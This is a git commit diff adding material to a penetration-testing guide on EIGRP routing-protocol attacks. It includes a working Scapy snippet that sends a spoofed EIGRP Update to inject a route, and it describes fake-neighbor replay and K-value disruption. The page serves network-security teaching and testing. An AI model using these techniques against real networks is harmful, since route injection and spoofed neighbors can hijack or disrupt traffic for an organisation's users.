Add content from: Research Update Enhanced src/generic-methodologies-and-resou...

HackTricks News Bot · HackTricks News Bot · commit 8fe8ac63e806 · 2026-03-12T17:07:29.000Z
diff --git a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
@@ -58,7 +58,43 @@
   - `--as`: Defines the EIGRP AS number.
   - `--src`: Sets the attacker’s IP address.
 
-{{#include ../../banners/hacktricks-training.md}}
+## **Protocol Notes Useful for Attacks**
+
+- **HELLO packets carry K-values and neighbors only form when they match.** This is the basis for K-value mismatch/relationship disruption attacks and why mismatched K-values prevent adjacency.
+- **The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time**, so passive captures reveal the exact values used on the segment.
+
+## **Scapy Packet Crafting (Route Injection / Fake Neighbors)**
+
+Scapy ships an EIGRP contrib layer with TLVs like `EIGRPParam` and `EIGRPIntRoute`, which is enough to craft UPDATEs for route injection. Example adapted from the `davidbombal/scapy` EIGRP route injection script:
+
+```python
+from scapy.all import *
+load_contrib("eigrp")
+
+sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
+      EIGRP(opcode="Update", asn=100, seq=0, ack=0,
+            tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
+                                   nexthop="192.168.1.248")]))
+```
+
+The same repo includes quick "fake neighbor" scripts that sniff a real EIGRP packet and replay it with a spoofed source IP to create phantom neighbors (useful for CPU/neighbor-table pressure).
 
+- Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
+- Example scripts: https://github.com/davidbombal/scapy
+
+## **Routopsy & NSE Helpers**
+
+- **Routopsy** builds a virtual-router attack lab (FRRouting + Scapy) and includes DRP attacks you can adapt for EIGRP tests. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
+- Nmap's NSE has a small `eigrp` library for parsing/generating a subset of EIGRP packets. https://nmap.org/nsedoc/lib/eigrp.html
+
+## **Authentication Recon**
+
+- EIGRP named mode supports **HMAC-SHA-256 authentication** via `authentication mode hmac-sha-256 ...`. If enabled, crafted packets must be authenticated with the correct key; if not enabled, spoofing/injection is easier to validate.
+
+## **References**
+- [https://www.rfc-editor.org/rfc/rfc7868.html](https://www.rfc-editor.org/rfc/rfc7868.html)
+- [https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html)
+
+{{#include ../../banners/hacktricks-training.md}}
 
 
